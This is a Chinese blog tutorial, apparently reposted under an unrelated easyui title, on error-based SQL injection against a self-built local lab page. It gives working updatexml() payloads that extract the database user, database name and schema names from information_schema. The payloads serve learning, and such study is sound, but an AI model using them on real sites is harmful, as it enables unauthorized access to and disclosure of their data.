easyui datebox 获取值报错_报错注入攻击方法

最新推荐文章于 2021-05-28 09:33:53 发布
最新推荐文章于 2021-05-28 09:33:53 发布
阅读量117 收藏
点赞数
文章标签: easyui datebox 获取值报错
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42361623/article/details/112109240
版权
4b42adb2a0e5e703ff5572f2d178976f.png

0x0同理搭建环境很简单,编写好代码,扔到phpstudy下的跟目录。

测试代码:

cd555e093bf9475909b8b40bc774a5ac.png

测试代码

0x1进行靶场测试

6a8b8aeb3246b8c21902d34dcaf7f876.png

测试页面

老套路输入单引号:

e8999c860b08f731edd7dc4918aef46c.png

出现报错

可以看出这里存在注入点。

使用函数updatexml()获取user()的值:

' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+

0x7e是ASCII编码,解码下是~

测试效果:

255e3f27591ebf8bb0f42b533a8af284.png

user()信息

在尝试获得数据库名

' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

测试效果:

df86cc58f0f3d8c2c3f0d6b2b6a80ca5.png

database()返回页面

下面获取表名、字段内容,查询语句跟union注入相同,使用limit语句。

' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e),1)--+

a4ea2b61a04dcbb801b7d1090ec91ca6.png

获得第一个数据库名

同理通过改变limit 数字获得test数据库名,同理获取数据库test下的表名:

5fb030b19407e8cda8718b1f4596c4b2.png

获得表名users

通过单引号报错,我们可以利用floor(),updatexml()等函数进行查询数据库相关信息。

下节关注时间注入。

椒盐皮皮鲲
关注
EasyuiDateBox日期输入框
月亮投递员的博客
06-29 2134
DateBox初步介绍前言案例演示1、静态html实现2、js动态加载数据实现总结 前言 今天为大家分享的知识点是DateBox组件,博主自主学习之后决定分享给你们啦,感兴趣的小伙伴们搬好小板凳啦~ 案例演示 根据之前学过的easyui中的Tree组件、Tabs选项卡、datagrid组件以来,发现使用这些组件大部分的共同点就是通过以下两种方式实现: 当然,不管怎样实现,还是得经过这些流程: 1、新建一个动态的web项目,也就是Dynamic Web Project ! 2、在webcontent下
easyui-lang-zh_CN.js,easyui汉化包
08-09
easyui插件的支持日期汉化,分页汉化,form表单提示汉化。
easyui datebox 取值报错_浅谈基于报错的手工注入
weixin_42347763的博客
12-17 207
浅谈基于报错的手工注入实验环境:sqlli1.首先提示,请输入ID作为参数和数值2.构建id参数后,返回正常3.输入转义符 \ ,得到报错信息 "1\") LIMIT 0,1 (图片上引号内的为报错信息,所以这里去掉两个引号)由此,我们可以得到大概的SQL语句为尝试闭合单引号,并注释之后的内容,输入1") --+可以看到返回正常页面4.在闭合后,输入order by 5 判断有几...
jquery easyui datebox 的使用需要注意的问题
热门推荐
张波的技术积累
09-25 1万+
1.  加入日期选择框 $("#dd").datebox({"required":true}); 在id为dd的input type=text的输入框加入iquery easyui的日期选择框,且该日期必须输入时,使用(required: true),否则使用required:false; 2. javascript取日期选择框的值 $("#dd").dateb
easyUI easyui-datebox 向后台传值报错400
qq_40603183的博客
12-03 365
cjDatStart : $("#cjDatStart").datebox("getValue") @DateTimeFormat(pattern = "yyyy-MM-dd") private Date tsDatEnd; // 退市日期-搜索结束时间 注解中的格式应与日期输入框中格式一定要保持一致 ...
Easyui-Datebox设置隐藏或者不可用的解决方法
10-19
最近我在做一个安全监测系统,选择了用easyui进行搭建,easyui是一种基于jQuery的用户界面插件集合。使用easyui可以省去很多代码,功能上需要加...下面小编给大家介绍下给Easyui-Datebox设置隐藏或者不可用的解决方法
easyui datebox 时间限制,datebox开始时间限制结束时间,datebox截止日期比起始日期大的实现代码
08-31
EasyUIDatebox组件是一个常用的日期选择器,能够方便地集成到网页中,为用户提供日期选择的功能。本文将详细介绍如何使用EasyUI Datebox设置时间限制,包括开始时间与结束时间的关联限制,以及确保截止日期始终...
jquery-easyui-themes.rar_easyui 主题_easyui主题_html_jquery_jquery-e
09-20
《jQuery EasyUI 主题详解与应用》 jQuery EasyUI 是一款基于 jQuery 的前端框架,它提供了丰富的组件和易于使用的API,极大地简化了Web界面的开发。而其核心魅力之一,便是丰富的主题系统,使得开发者可以轻松定制...
jquery-easyui.rar_easyUI jsp_easyui jsp_easyui框架_jQuery.easyu
09-23
标签中的 "easyui___jsp"、"easyui__jsp" 和 "jquery.easyui__jsp" 强调了 EasyUI 在JSP环境下的应用。这表明这个压缩包可能包含了与JSP集成的示例代码或者库文件,帮助开发者了解如何在JSP项目中使用EasyUI。 ...
Jquery-EasyUi-demo.rar_DEMO_easyui_easyui demo_floatingg93_organ
09-20
这个DEMO对于初学者来说是一个很好的起点,它通过实际案例展示了EasyUI的基本使用方法和常见的功能组合。通过深入研究这个项目,开发者可以快速掌握EasyUI的用法,并将这些知识应用于自己的项目中。同时,"floatingg...
关于easyUI控件easyui-datetimebox的value值设置错误的解决办法
misstang1996的博客
10-25 2310
问题:在jsp页面的<input/>标签中使用easyUI时间控件easyui-datetimebox,直接在value处传入动态取到的毫秒数转换成的时间格式时,不能正常显示时分秒。 转换后的值alert的图片:    页面显示的图片:(标红位置为使用了easyui-datetimebox的输入框)无法正常显示时分秒。  查看浏览器页面代码发现问题的所在:(动态传入的va...
EasyUI容易被js脚本攻击的基本处理
navy专栏
08-26 3379
修改EasyUI中的jquery.easyui.min.js文件,如下:
easyui_demo_DEMO_easyui的一个demo_easyui_
09-29
总的来说,"easyui_demo" 提供了一个了解和学习 EasyUI 的良好平台,对于初学者来说,可以通过分析和修改这些示例,快速掌握 EasyUI 的使用方法,并将其应用到自己的项目中。对于有经验的开发者,这些示例也可以作为...
使用easyuidatetimebox 取不到值
--lky的博客
05-28 460
function init(){ var searchMap = { name: $("#name").val().trim(), beginTime: $('#beginTime').datetimebox("getValue"), endTime: $('#endTime').datetimebox("getValue") }; <div id="searchTools"> <form id="searchForm"...
前端easyUI时间控件datebox小bug问题修复
zcswl7961的博客
11-26 4493
最近做公司的一个项目,需要用到easyUI控件的日期选择控件DateBox,DateBox是一个很好的日期选择控件,只需要引用easyUI的js <link rel="stylesheet" type="text/css" href="css/easyui.css"> <script type="text/javascript" src="js/jquery-1.8.0.min.js"></scr
【9493】基于springboot+vue的美食信息推荐系统的设计与实现.zip
最新发布
11-13
技术选型 【后端】:Java 【框架】:springboot 【前端】:vue 【JDK版本】:JDK1.8 【服务器】:tomcat7+ 【数据库】:mysql 5.7+ 项目包含前后台完整源码。 项目都经过严格调试,确保可以运行! 具体项目介绍可查看博主文章或私聊取 助力学习实践,提升编程技能,快来取这份宝贵的资源吧! 在当今快速发展的信息技术领域,技术选型是决定一个项目成功与否的重要因素之一。基于以下的技术栈,我们为您带来了一份完善且经过实践验证的项目资源,让您在学习和提升编程技能的道路上事半功倍。以下是该项目的技术选型和其组件的详细介绍。 在后端技术方面,我们选择了Java作为编程语言。Java以其稳健性、跨平台性和丰富的库支持,在企业级应用中处于领导地位。项目采用了流行的Spring Boot框架,这个框架以简化Java企业级开发而闻名。Spring Boot提供了简洁的配置方式、内置的嵌入式服务器支持以及强大的生态系统,使开发者能够更高效地构建和部署应用。 前端技术方面,我们使用了Vue.js,这是一个用于构建用户界面的渐进式JavaScript框架。Vue以其易上手、灵活和性能出色而受到开发者的青睐,它的组件化开发思想也有助于提高代码的复用性和可维护性。 项目的编译和运行环境选择了JDK 1.8。尽管Java已经推出了更新的版本,但JDK 1.8依旧是一种成熟且稳定的选择,广泛应用于各类项目中,确保了兼容性和稳定性。 在服务器方面,本项目部署在Tomcat 7+之上。Tomcat是Apache软件基金会下的一个开源Servlet容器,也是应用最为广泛的Java Web服务器之一。其稳定性和可靠的性能表现为Java Web应用提供了坚实的支持。 数据库方面,我们采用了MySQL 5.7+。MySQL是一种高效、可靠且使用广泛的关系型数据库管理系统,5.7版本在性能和功能上都有显著的提升。 值得一提的是,该项目包含了前后台的完整源码,并经过严格调试,确保可以顺利运行。通过项目的学习和实践,您将能更好地掌握从后端到前端的完整开发流程,提升自己的编程技能。欢迎参考博主的详细文章或私信取更多信息,利用这一宝贵资源来推进您的技术成长之路!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值